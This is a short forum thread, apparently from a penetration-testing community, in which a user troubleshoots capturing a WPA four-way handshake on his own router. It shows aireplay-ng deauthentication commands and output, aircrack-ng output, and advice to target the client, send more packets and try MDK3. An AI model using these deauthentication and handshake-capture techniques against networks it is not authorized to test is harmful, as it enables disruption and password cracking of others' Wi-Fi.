Thread: Problems with 4 way handshake...

  1. #1
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    Problems with 4 way handshake...

    Can't get the 4 way handshake captured.... not understanding why my router won't allow me to deauthenticate. Any advice welcome..
    CH 5 ][ Elapsed: 6 mins ][ 2008-09-28 17:04 *(NOTHING APPEARED HERE DURING DEAUTH)*

    BSSID              PWR  RXQ  Beacons  #Data,  #/s  CH  MB   ENC  CIPHER  AUTH  ESSID

    00:1D:5A:F7:80:E9  50   0    3450     210346  821  5   54.  WPA  TKIP    PSK   2WIRE606

    BSSID              STATION            PWR  Rate   Lost  Packets  Probes

    00:1D:5A:F7:80:E9  00:19:5B:02:33:74  52   54-54  620   210135

    -----------------------------------------------------------------------------------------

    Deauth:

    bt ~ # aireplay-ng -0 5 -a 00:1D:5A:F7:80:E9 wlan0
    16:58:01 Waiting for beacon frame (BSSID: 00:1D:5A:F7:80:E9) on channel 5
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    16:58:01 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:03 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:04 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:04 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]
    16:58:05 Sending DeAuth to broadcast -- BSSID: [00:1D:5A:F7:80:E9]




    Testing capture just to make sure it wasn't missed:

    bt ~ # aircrack-ng wpa-01.cap
    Opening wpa-02.cap
    Read 40320 packets.

    # BSSID ESSID Encryption

    1 00:1D:5A:F7:80:E9 2WIRE606 WPA (0 handshake)

    Choosing first network as target.


    The wpa cap file name is correct and my desktop is connected (CLIENT) but can't deauth it..

  2. #2
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Try using the host (-h) and client (-c) options when running aireplay-ng to deauth.
    Code:
    aireplay-ng -0 5 -a <ap_mac> -h <host_mac> -c <client_mac> <interface>
    This may help.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  3. #3
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    As pynstrom says, targeting the client will generally give you a greater success rate. You should also make sure that you are close enough to the AP for it to receive your injected packets and close enough to the client as well so that you can intercept the client side of the handshake. As you currently only are sending 5 de-authentication packets, I would also advise you to increase the amount.

    If your problems using the de-authentication attack in aireplay-ng persist, you could always give MDK3 a try.
    -Monkeys are like nature's humans.

  4. #4
    Just burned his ISO
    Join Date
    Aug 2008
    Posts
    9

    The handshake was successful, thanks guys!
